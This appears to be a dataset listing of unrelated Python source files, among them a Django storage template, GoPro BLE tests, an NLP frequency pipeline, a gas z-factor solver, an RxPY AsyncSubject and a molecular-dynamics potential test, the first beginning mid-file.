# target[k[0]][k[1]][0] = np.uint8(round(x[v][0])%256)
# target[k[0]][k[1]][1] = np.uint8(round(x[v][1])%256)
# target[k[0]][k[1]][2] = np.uint8(round(x[v][2])%256)
cv2.imwrite("result_0{0}.jpg".format(pic_index), target)
|
python
|
from typing import List, Optional, Tuple, Dict, Callable
import torch
from torch import Tensor
from tha2.poser.poser import PoseParameterGroup, Poser
from tha2.nn.batch_module.batch_input_module import BatchInputModule
from tha2.compute.cached_computation_func import TensorListCachedComputationFunc
class GeneralPoser02(Poser):
def __init__(self,
module_loaders: Dict[str, Callable[[], BatchInputModule]],
device: torch.device,
output_length: int,
pose_parameters: List[PoseParameterGroup],
output_list_func: TensorListCachedComputationFunc,
subrect: Optional[Tuple[Tuple[int, int], Tuple[int, int]]] = None,
default_output_index: int = 0):
self.default_output_index = default_output_index
self.output_list_func = output_list_func
self.subrect = subrect
self.pose_parameters = pose_parameters
self.device = device
self.module_loaders = module_loaders
self.modules = None
self.num_parameters = 0
for pose_parameter in self.pose_parameters:
self.num_parameters += pose_parameter.get_arity()
self.output_length = output_length
def get_modules(self):
if self.modules is None:
self.modules = {}
for key in self.module_loaders:
module = self.module_loaders[key]()
self.modules[key] = module
module.to(self.device)
module.train(False)
return self.modules
def get_pose_parameter_groups(self) -> List[PoseParameterGroup]:
return self.pose_parameters
def get_num_parameters(self) -> int:
return self.num_parameters
def pose(self, image: Tensor, pose: Tensor, output_index: Optional[int] = None) -> Tensor:
if output_index is None:
output_index = self.default_output_index
output_list = self.get_posing_outputs(image, pose)
return output_list[output_index]
def get_posing_outputs(self, image: Tensor, pose: Tensor) -> List[Tensor]:
modules = self.get_modules()
if len(image.shape) == 3:
image = image.unsqueeze(0)
if len(pose.shape) == 1:
pose = pose.unsqueeze(0)
if self.subrect is not None:
image = image[:, :, self.subrect[0][0]:self.subrect[0][1], self.subrect[1][0]:self.subrect[1][1]]
batch = [image, pose]
outputs = {}
return self.output_list_func(modules, batch, outputs)
def get_output_length(self) -> int:
return self.output_length
|
python
|
# test_ble_commands.py/Open GoPro, Version 1.0 (C) Copyright 2021 GoPro, Inc. (http://gopro.com/OpenGoPro).
# This copyright was auto-generated on Tue May 18 22:08:51 UTC 2021
import pytest
from construct import Int32ub
from open_gopro.ble_commands import BLECommunicator, BleCommands, BleSettings, BleStatuses
from open_gopro.constants import SettingId, StatusId, UUID, CmdId, QueryCmdId, ProducerType
from open_gopro import params, proto
@pytest.fixture
def ble():
class Communicator(BLECommunicator):
def __init__(self):
self.commands = BleCommands(self)
self.statuses = BleStatuses(self)
self.settings = BleSettings(self)
def read(self, uuid: UUID):
return uuid
def write(self, uuid: UUID, data: bytearray):
return uuid, data
def register_listener(self, producer: ProducerType) -> bool:
return True
def unregister_listener(self, producer: ProducerType) -> bool:
return True
def get_update(self) -> bool:
return True
yield Communicator()
def test_write_command_correct_uuid_cmd_id(ble):
uuid, data = ble.commands.set_shutter(params.Shutter.ON)
assert uuid is UUID.CQ_COMMAND
assert data[1] == CmdId.SET_SHUTTER.value
def test_write_command_correct_parameter_data(ble):
uuid, data = ble.commands.load_preset(params.Preset.TIME_LAPSE)
assert uuid is UUID.CQ_COMMAND
assert Int32ub.parse(data[-4:]) == params.Preset.TIME_LAPSE.value
def test_read_command_correct_uuid(ble):
uuid = ble.commands.get_wifi_ssid()
assert uuid is UUID.WAP_SSID
def test_setting_set(ble):
uuid, data = ble.settings.resolution.set(params.Resolution.RES_1080)
assert uuid is UUID.CQ_SETTINGS
assert data[1] == SettingId.RESOLUTION.value
assert data[3] == params.Resolution.RES_1080.value
def test_setting_get_value(ble):
uuid, data = ble.settings.resolution.get_value()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.GET_SETTING_VAL.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_get_capabilities_values(ble):
uuid, data = ble.settings.resolution.get_capabilities_values()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.GET_CAPABILITIES_VAL.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_register_value_update(ble):
uuid, data = ble.settings.resolution.register_value_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.REG_SETTING_VAL_UPDATE.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_unregister_value_update(ble):
uuid, data = ble.settings.resolution.unregister_value_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.UNREG_SETTING_VAL_UPDATE.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_register_capability_update(ble):
uuid, data = ble.settings.resolution.register_capability_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.REG_CAPABILITIES_UPDATE.value
assert data[2] == SettingId.RESOLUTION.value
def test_setting_unregister_capability_update(ble):
uuid, data = ble.settings.resolution.unregister_capability_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.UNREG_CAPABILITIES_UPDATE.value
assert data[2] == SettingId.RESOLUTION.value
def test_status_get_value(ble):
uuid, data = ble.statuses.encoding_active.get_value()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.GET_STATUS_VAL.value
assert data[2] == StatusId.ENCODING.value
def test_status_register_value_update(ble):
assert ble.register_listener(None)
uuid, data = ble.statuses.encoding_active.register_value_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.REG_STATUS_VAL_UPDATE.value
assert data[2] == StatusId.ENCODING.value
def test_status_unregister_value_update(ble):
assert ble.unregister_listener(None)
uuid, data = ble.statuses.encoding_active.unregister_value_update()
assert uuid is UUID.CQ_QUERY
assert data[1] == QueryCmdId.UNREG_STATUS_VAL_UPDATE.value
assert data[2] == StatusId.ENCODING.value
def test_proto_command_arg(ble):
uuid, data = ble.commands.set_turbo_mode(True)
assert uuid is UUID.CQ_COMMAND
assert data == bytearray(b"\x04\xf1k\x08\x01")
out = proto.ResponseGeneric.FromString(data[3:])
print(out)
d = out.to_dict()
def test_proto_command_kwargs(ble):
uuid, data = ble.commands.get_preset_status(
register_preset_status=[
params.EnumRegisterPresetStatus.REGISTER_PRESET_STATUS_PRESET,
params.EnumRegisterPresetStatus.REGISTER_PRESET_STATUS_PRESET_GROUP_ARRAY,
],
unregister_preset_status=[params.EnumRegisterPresetStatus.REGISTER_PRESET_STATUS_PRESET],
)
assert uuid is UUID.CQ_COMMAND
assert data == b"\t\xf5\x02\n\x02\x01\x02\x12\x01\x01"
|
python
|
from django.conf import settings
# - {% if cookiecutter.django_media_engine == S3 %}
from storages.backends.s3boto3 import S3Boto3Storage
class PrivateMediaStorage(S3Boto3Storage):
"""Media storage which disables public access by default
When you use this as the default storage it makes sense to
turn off all public access to the bucket.
# - {%- if cookiecutter.thorgate == YES %}
You can do this by changing the `s3_media_bucket_is_public` variable
in Terraform to false in the file {{cookiecutter.repo_name}}/utils/terraform/variables.tf
# - {%- endif %}
"""
location = settings.MEDIAFILES_LOCATION
default_acl = "private"
class MediaStorage(S3Boto3Storage):
location = settings.MEDIAFILES_LOCATION
default_acl = "public-read"
# - {%- endif %}{% if cookiecutter.django_media_engine == GCS %}
from storages.backends.gcloud import GoogleCloudStorage
class PrivateMediaStorage(GoogleCloudStorage):
location = settings.MEDIAFILES_LOCATION
default_acl = "private"
class MediaStorage(GoogleCloudStorage):
location = settings.MEDIAFILES_LOCATION
default_acl = "publicRead"
# - {% endif %}
|
python
|
"""
Implementation of POSFrequencyPipeline for score ten only.
"""
import json
import re
from constants import ASSETS_PATH
from core_utils.article import ArtifactType
from core_utils.visualizer import visualize
from pipeline import CorpusManager, validate_dataset
class EmptyFileError(Exception):
"""
Custom error
"""
class IncorrectFormatError(Exception):
"""
Custom error
"""
class POSFrequencyPipeline:
def __init__(self, corpus_manager: CorpusManager):
self.corpus_manager = corpus_manager
def run(self):
"""
Running the pipeline scenario
"""
for article in self.corpus_manager.get_articles().values():
# get the file to take the pos tags from
with open(article.get_file_path(ArtifactType.single_tagged), encoding="utf-8") as st_file:
morph_text = st_file.read()
validate_input(morph_text)
freqs = self._generate_freqs_pos(morph_text)
# TASK
freqs_cases = self._generate_freqs_n_cases(morph_text)
# save calculated freqs to meta file
with open(ASSETS_PATH / article.get_meta_file_path(), encoding="utf-8") as m_file:
meta_info = json.load(m_file)
meta_info.update({"pos_frequencies": freqs})
with open(ASSETS_PATH / article.get_meta_file_path(), "w", encoding="utf-8") as m_file:
json.dump(meta_info, m_file, indent=4, ensure_ascii=False, separators=(',', ':'))
# visualise results
visualize(statistics=freqs, path_to_save=ASSETS_PATH / f"{article.article_id}_image.png")
visualize(statistics=freqs_cases, path_to_save=ASSETS_PATH / f"{article.article_id}_case_image.png")
def _generate_freqs_pos(self, text):
freqs_dict = {}
pos_pattern = re.findall(r"<([A-Z]+)", text)
for pos in pos_pattern:
freqs_dict[pos] = freqs_dict.get(pos, 0) + 1
return freqs_dict
def _generate_freqs_n_cases(self, text):
freqs_dict = {}
nouns = re.findall(r"<S.*>", text)
cases_search = re.compile(r"([а-я]+),(?=мн|ед)")
cases_names = ["им", "род", "дат", "вин", "твор", "пр", "парт", "местн", "зват"]
for noun in nouns:
cases = re.findall(cases_search, noun)
for case in cases:
if case in cases_names:
freqs_dict[case] = freqs_dict.get(case, 0) + 1
return freqs_dict
def validate_input(to_validate):
if not to_validate:
raise EmptyFileError("There is nothing in the file.")
if not isinstance(to_validate, str):
raise IncorrectFormatError("The file should be read into string.")
def main():
validate_dataset(ASSETS_PATH)
corpus_manager = CorpusManager(ASSETS_PATH)
pipeline = POSFrequencyPipeline(corpus_manager=corpus_manager)
pipeline.run()
if __name__ == "__main__":
main()
|
python
|
#!/usr/bin/env python
"""Helper functions to store and get the selected backend"""
from collections import namedtuple
import logging
from dosna.util import named_module
log = logging.getLogger(__name__)
_current = None
AVAILABLE = ['ram', 'hdf5', 'ceph', 'sage', 's3']
# Currently there is no need for more fancy attributes
Backend = namedtuple('Backend', ['name', 'Connection', 'Dataset', 'DataChunk'])
def use_backend(backend):
backend = backend.lower()
global _current
if backend in AVAILABLE:
module_ = named_module('dosna.backends.{}'.format(backend))
if hasattr(module_, '_backend'):
log.debug('Switching backend to `%s`', module_._backend.name)
_current = module_._backend
else:
raise Exception(
'Module `{}` is not a proper backend.'.format(backend))
else:
raise Exception('Backend `{}` not available! Choose from: {}'
.format(backend, AVAILABLE))
def get_backend(name=None):
if name is not None:
use_backend(name)
if _current is None:
use_backend(AVAILABLE[0])
return _current
|
python
|
from helpers.runner import run_main
from helpers.cli import cmdout
def test_no_cmd(cmdout):
try:
run_main([])
except SystemExit:
pass
cmdout.assert_substrs_in_line(0, ["usage:"], on_stderr=True)
|
python
|
from ZstudentDAO import studentDAO
# We put in the data we get passed up from the json
#create
latestid = studentDAO.create(('Eilish', 22))
#find by id
result = studentDAO.findByID(latestid); # needs to be made into json object
print (result)
#update
studentDAO.update(('Liam',23,latestid))
result = studentDAO.findByID(latestid);
print (result)
#getall
allStudents = studentDAO.getAll()
for student in allStudents:
print(student)
#delete
studentDAO.delete(latestid)
|
python
|
"""
Script to solve z-factor and gas density at the same time
Using Dranchuk and Aboukassem (1975)
"""
def dranchuk(T_pr, P_pr):
# T_pr : calculated pseudoreduced temperature
# P_pr : calculated pseudoreduced pressure
from scipy.optimize import fsolve # non-linear solver
import numpy as np
a1 = 0.3265; a2 = -1.0700; a3 = -0.5339; a4 = 0.01569; a5 = -0.05165; a6 = 0.5475
a7 = -0.7361; a8 = 0.1844; a9 = 0.1056; a10 = 0.6134; a11 = 0.7210
def f(y):
rho_pr, z = y
c1 = a1 + (a2/T_pr) + (a3/(T_pr**3))+ (a4/(T_pr**4))+ (a5/(T_pr**5))
c2 = a6 + (a7/T_pr) + (a8/(T_pr**2))
c3 = a9*((a7/T_pr) + (a8/(T_pr**2)))
c4 = (a10)*(1+(a11*(rho_pr**2)))*((rho_pr**2)/(T_pr**3))*(np.exp(-a11*(rho_pr**2)))
f1 = z + (c3*(rho_pr**5)) - (c2*(rho_pr**2)) - (c1*(rho_pr**1)) - c4 - 1
f2 = rho_pr - ((0.27 * P_pr) / (z * T_pr))
return[f1, f2]
solve = fsolve(f, [1, 1]) # initial guess
return(solve[0], solve[1]) # result is density, z-factor
|
python
|
# Generated by Django 3.0.2 on 2020-03-06 22:30
from django.db import migrations
import streamfield.fields
class Migration(migrations.Migration):
dependencies = [
('pagine', '0014_event_carousel'),
]
operations = [
migrations.AddField(
model_name='blog',
name='carousel',
field=streamfield.fields.StreamField(blank=True, default='[]', help_text='Una sola galleria, per favore, larghezza minima immagini 2048px', null=True, verbose_name='Galleria'),
),
migrations.AlterField(
model_name='event',
name='carousel',
field=streamfield.fields.StreamField(blank=True, default='[]', help_text='Una sola galleria, per favore, larghezza minima immagini 2048px', null=True, verbose_name='Galleria'),
),
]
|
python
|
from typing import Any, Optional
from rx.disposable import Disposable
from rx.core import typing
from .subject import Subject
from .innersubscription import InnerSubscription
class AsyncSubject(Subject):
"""Represents the result of an asynchronous operation. The last value
before the close notification, or the error received through
on_error, is sent to all subscribed observers."""
def __init__(self) -> None:
"""Creates a subject that can only receive one value and that value is
cached for all future observations."""
super().__init__()
self.value = None
self.has_value = False
def _subscribe_core(self,
observer: typing.Observer,
scheduler: Optional[typing.Scheduler] = None
) -> typing.Disposable:
with self.lock:
self.check_disposed()
if not self.is_stopped:
self.observers.append(observer)
return InnerSubscription(self, observer)
ex = self.exception
has_value = self.has_value
value = self.value
if ex:
observer.on_error(ex)
elif has_value:
observer.on_next(value)
observer.on_completed()
else:
observer.on_completed()
return Disposable()
def _on_next_core(self, value: Any) -> None:
"""Remember the value. Upon completion, the most recently received value
will be passed on to all subscribed observers.
Args:
value: The value to remember until completion
"""
with self.lock:
self.value = value
self.has_value = True
def _on_completed_core(self) -> None:
"""Notifies all subscribed observers of the end of the sequence. The
most recently received value, if any, will now be passed on to all
subscribed observers."""
with self.lock:
observers = self.observers.copy()
self.observers.clear()
value = self.value
has_value = self.has_value
if has_value:
for observer in observers:
observer.on_next(value)
observer.on_completed()
else:
for observer in observers:
observer.on_completed()
def dispose(self) -> None:
"""Unsubscribe all observers and release resources."""
with self.lock:
self.value = None
super().dispose()
|
python
|
from django.db import models
from django.utils.translation import gettext_lazy as _
from django.utils.timezone import now
class BaseModel(models.Model):
created = models.DateTimeField(auto_now_add=True, verbose_name=_("Created, UTC"))
updated = models.DateTimeField(auto_now=True, verbose_name=_("Updated, UTC"))
@property
def human_date(self):
delta = now() - self.created
if delta.total_seconds() < 60 * 60:
return "just now"
elif delta.total_seconds() < 60 * 60 * 5:
return "%sh ago" % str(int(delta.total_seconds() / (60 * 60)))
elif delta.total_seconds() < 60 * 60 * 24:
return "today"
elif delta.total_seconds() < 60 * 60 * 24 * 7:
return "%sd ago" % str(int(delta.total_seconds() / (60 * 60 * 24)))
else:
return self.created.strftime("%d %b %Y")
class Meta:
abstract = True
class Email(BaseModel, models.Model):
name = models.CharField(max_length=255, blank=True, null=True)
email = models.EmailField()
subject = models.CharField(max_length=255)
message = models.TextField()
meta = models.TextField(blank=True, null=True)
is_sent = models.BooleanField(blank=True, default=False)
|
python
|
# Testing various potentials.
from asap3 import *
from asap3.md.verlet import VelocityVerlet
from asap3.EMT2013Parameters import PtY_parameters
from ase.lattice.cubic import *
from ase.lattice.compounds import *
from numpy import *
from asap3.testtools import ReportTest
try:
import potResults
except ImportError:
resultfail = True
else:
resultfail = False
import os
timeunit = 1.018047e-14 # Seconds
femtosecond = 1e-15 / timeunit # Femtosecond in atomic units
print_version(1)
def dotest(atoms, nsteps, ampl, name):
print "Potential energy", atoms.get_potential_energy() / len(atoms)
r = atoms.get_positions()
r.flat[:] += ampl * sin(arange(3*len(atoms)))
atoms.set_positions(r)
print "Potential energy", atoms.get_potential_energy() / len(atoms)
print "Running Verlet dynamics (%s)" % (name,)
dyn = VelocityVerlet(atoms, 2*femtosecond)
etot1 = (atoms.get_potential_energy() + atoms.get_kinetic_energy())
dyn.run(nsteps)
etot2 = (atoms.get_potential_energy() + atoms.get_kinetic_energy())
ReportTest(("Energy conservation (%s)" % (name,)), etot1, etot2, 1.0)
print etot1, etot2
epot = atoms.get_potential_energies()
stress = atoms.get_stresses()
if firsttime:
print "Reporting energies and stresses"
e = []
s = []
j = 0
for i in range(0, len(atoms), 100):
e.append(epot[i])
s.append(stress[i,j])
j = (j + 1) % 6
print >> out, "e"+name+" =", repr(e)
print >> out, "s"+name+" =", repr(s)
else:
print "Testing energies and stresses"
j = 0
eres=getattr(potResults, "e"+name)
sres=getattr(potResults, "s"+name)
for i in range(len(atoms)/100):
ReportTest(("%s energy %d" % (name, i*100)),
epot[i*100], eres[i], 1e-8, silent=True)
ReportTest(("%s stress %d" % (name, i*100)),
stress[i*100, j], sres[i], 1e-8, silent=True)
j = (j + 1) % 6
firsttime = (len(sys.argv) >= 2 and sys.argv[1] == '--first')
if firsttime and os.path.exists("potResults.py"):
print "This will overwrite the result file 'potResults.py'."
print "If you really want to do this, erase it and run this again."
sys.exit(1)
if resultfail and not firsttime:
print "Importing 'potResults.py' failed!"
print "Maybe you need to create it with the --first option."
sys.exit(1)
if firsttime:
print "Creating the file 'potResults.py'"
out = open('potResults.py', "w")
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol="Cu", pbc=(1,0,1), debug=0)
ReportTest("Number of Cu atoms", len(atoms), 13500, 0)
atoms.set_calculator(EMT())
dotest(atoms, 50, 0.1, "EMT_Cu")
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol="Cu", pbc=(1,0,1), debug=0)
ReportTest("Number of Cu atoms", len(atoms), 13500, 0)
atoms.set_calculator(EMT(EMTRasmussenParameters()))
dotest(atoms, 50, 0.1, "EMT_Cu_Rasm")
#atoms = BodyCenteredCubic([[1,0,0],[0,1,0],[0,0,1]], size=(15,15,30),
# element="Mo", periodic=(1,0,1), debug=0)
#ReportTest("Number of Mo atoms", len(atoms), 13500, 0)
#
#atoms.SetCalculator(MoPotential())
#dotest(atoms, 50, 0.06, "Mo")
atoms = L1_2(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol=("Cu", "Au"), latticeconstant=3.95, pbc=(1,0,1),
debug=0)
ReportTest("Number of alloy atoms", len(atoms), 13500, 0)
nCu = sum(equal(atoms.get_atomic_numbers(), 29))
nAu = sum(equal(atoms.get_atomic_numbers(), 79))
ReportTest("Number of Cu atoms in alloy", nCu, 13500/4, 0)
ReportTest("Number of Au atoms in alloy", nAu, 3*13500/4, 0)
atoms.set_calculator(EMT())
dotest(atoms, 50, 0.06, "EMT_CuAu3")
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol="Pt", pbc=(1,0,1), debug=0)
ReportTest("Number of Pt atoms", len(atoms), 13500, 0)
atoms.set_calculator(EMT2013(PtY_parameters))
dotest(atoms, 50, 0.1, "EMT2013_Pt")
atoms = FaceCenteredCubic(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol="Y", latticeconstant=4.97,
pbc=(1,0,1), debug=0)
ReportTest("Number of Y atoms", len(atoms), 13500, 0)
atoms.set_calculator(EMT2013(PtY_parameters))
dotest(atoms, 50, 0.1, "EMT2013_Y")
atoms = L1_2(directions=[[1,0,0],[0,1,0],[0,0,1]], size=(15,15,15),
symbol=("Y", "Pt"), latticeconstant=4.06, pbc=(1,0,1),
debug=0)
ReportTest("Number of alloy atoms", len(atoms), 13500, 0)
nY = sum(equal(atoms.get_atomic_numbers(), 39))
nPt = sum(equal(atoms.get_atomic_numbers(), 78))
ReportTest("Number of Cu atoms in alloy", nY, 13500/4, 0)
ReportTest("Number of Au atoms in alloy", nPt, 3*13500/4, 0)
atoms.set_calculator(EMT2013(PtY_parameters))
dotest(atoms, 50, 0.06, "EMT2013_Pt3Y")
if firsttime:
# Create the "main" routine in the results module.
print >> out, 'if __name__ == "__main__":'
print >> out, ' print "This is not a test, but a module containing test results"'
out.close()
ReportTest.Summary()
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.